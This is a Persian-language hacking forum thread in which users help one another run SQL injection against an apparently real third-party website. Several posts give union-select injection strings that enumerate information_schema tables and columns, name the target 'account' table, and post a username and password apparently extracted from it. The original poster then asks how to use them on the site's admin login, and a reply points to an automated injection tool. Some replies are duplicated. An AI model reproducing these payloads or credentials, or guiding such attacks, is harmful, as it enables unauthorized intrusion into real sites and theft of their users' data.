سلام به همه ی دوستان ، سوالی در مورد SQLi داشتم:
لطفاً به سایت زیر نگاه کنید:
[Only registered and activated users can see links]
اینم اطلاعاتی که بدست آوردم:

number of culomn: 6

version: 5.0.81-community-log

table name: CHARACTER_SETS

ستون قابل تزریق= 3

ولی وقتی می خوام وارد table name مربوطه بشم و user & pass بگیرم error میده ودستوری هم که می زنم اینه:

union select 1,2,3,4,5,6 frome CHARACTER_SETS

لطفاً راهنمایی کنید!!!!
کوچیک همتون: Angel--Demon (آرین) :51:

درود

بهتر بود تو تاپیک سوال و جواب sql injection مطرح میکردی :..

باید از تیبل account تزریق میکردیcigar..

username:mm
password:Miles2010?

موفق ومعید باشید............::>.




________________________________


براي کشتن يک پرنده يک قيچي کافي ست. لازم نيست آن را در قلبش فرو کني.
يا گلويش را با آن بشکافي. پرهايش را بزن..... خاطره پريدن با او کاري مي کند که
خودش را به اعماق دره ها پرت کند.

درود

بهتر بود تو تاپیک سوال و جواب sql injection مطرح میکردی :..

باید از تیبل account تزریق میکردیcigar..

username:mm
password:Miles2010?

موفق ومعید باشید............::>.




________________________________


براي کشتن يک پرنده يک قيچي کافي ست. لازم نيست آن را در قلبش فرو کني.
يا گلويش را با آن بشکافي. پرهايش را بزن..... خاطره پريدن با او کاري مي کند که
خودش را به اعماق دره ها پرت کند.

دوستمون درست میگن،،
[Only registered and activated users can see links] ,5,6+from+information_schema.tables+where+table_sc hema=0x6D6D5F6D6D--
فقط تیبل accountبدرد بخورهست
[Only registered and activated users can see links] 4,5,6+from+information_schema.columns+where+table_ name=0x6163636F756E74--
اونهم این کولمون را داردid,email,password,lastaccess

خب حالا با این یوزر و پسورد چیکار میشه کرد؟

username:mm
password:Miles2010?

در صفحه ادمین که لاگین نمیکنه و میگه اشتب هست!

پس این با این یوزر و پسورد چیکار میشه کرد؟

درود

بهتر بود تو تاپیک سوال و جواب sql injection مطرح میکردی :..

باید از تیبل account تزریق میکردیcigar..

username:mm
password:Miles2010?

موفق ومعید باشید............::>.




________________________________


براي کشتن يک پرنده يک قيچي کافي ست. لازم نيست آن را در قلبش فرو کني.
يا گلويش را با آن بشکافي. پرهايش را بزن..... خاطره پريدن با او کاري مي کند که
خودش را به اعماق دره ها پرت کند.

ببخشید ، درست می گید دوست عزیز دفعه ی بعد حتماً جای درست سوال می پرسم
ببخشید برای من هنوز جا نیافتاده از کجا باید می فهمیدم table به نام account داره؟
وقتی دستور union select ... information_schema.tables رو می زنم ، برام فقط همون یه دونه table رو که نوشتم میاره ، ولی همانطور که دوستمون آقای hawrie نوشتن وقتی داخل دستور where table_schema قرار می گیره همه ی table هارو نشون می ده (یعنی چه موقع از این دستور استفاده می کنیم؟ من فیلمای آموزشیم رو گشتم توش این دستو رو پیدا نکردم ، لطفاً راجب به این where table_schema=یه عددی یکم توضیح بدید)
بازم ممنون

ببخشید ، درست می گید دوست عزیز دفعه ی بعد حتماً جای درست سوال می پرسم
ببخشید برای من هنوز جا نیافتاده از کجا باید می فهمیدم table به نام account داره؟
وقتی دستور union select ... Information_schema.tables رو می زنم ، برام فقط همون یه دونه table رو که نوشتم میاره ، ولی همانطور که دوستمون آقای hawrie نوشتن وقتی داخل دستور where table_schema قرار می گیره همه ی table هارو نشون می ده (یعنی چه موقع از این دستور استفاده می کنیم؟ من فیلمای آموزشیم رو گشتم توش این دستو رو پیدا نکردم ، لطفاً راجب به این where table_schema=یه عددی یکم توضیح بدید)
بازم ممنون

دوست عزیز برای درک بهتر شما از برنامه هویج 1.3 استفاده کن که واسه شروع خوبه....

وقتی مفاهیم واست خوب جا افتاد میتونی دستی تزریق کنی....